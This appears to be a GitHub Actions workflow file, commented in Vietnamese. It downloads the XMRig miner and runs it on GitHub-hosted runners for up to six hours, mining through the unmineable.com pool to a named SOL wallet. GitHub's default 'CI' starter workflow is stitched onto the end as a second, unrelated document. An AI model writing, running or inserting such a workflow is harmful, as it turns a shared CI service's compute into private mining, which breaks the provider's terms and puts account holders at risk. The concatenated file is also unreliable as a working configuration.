name: XMRig on GitHub Actions

on:
  workflow_dispatch:  # Cho phép bạn chạy bằng tay

jobs:
  miner:
    runs-on: ubuntu-latest
    timeout-minutes: 360  # Giới hạn tối đa của GitHub (6 tiếng)
    
    steps:
    - name: Update packages
      run: |
        sudo apt update

    - name: Install dependencies
      run: |
        sudo apt install -y wget tar

    - name: Download XMRig
      run: |
        wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-focal-x64.tar.gz
        tar xvaf xmrig-6.24.0-focal-x64.tar.gz
        cd xmrig-6.24.0
        chmod +x xmrig

    - name: Run XMRig
      run: |
        cd xmrig-6.24.0
        ./xmrig -o rx.unmineable.com:3333 -a rx -k -u SOL:9kexzJUm3ZRDvKw3K18V5zw6Raemu7NjfE4uiHzijEJd.vps2c -p x
# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v4

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo Add other actions to build,
          echo test, and deploy your project.
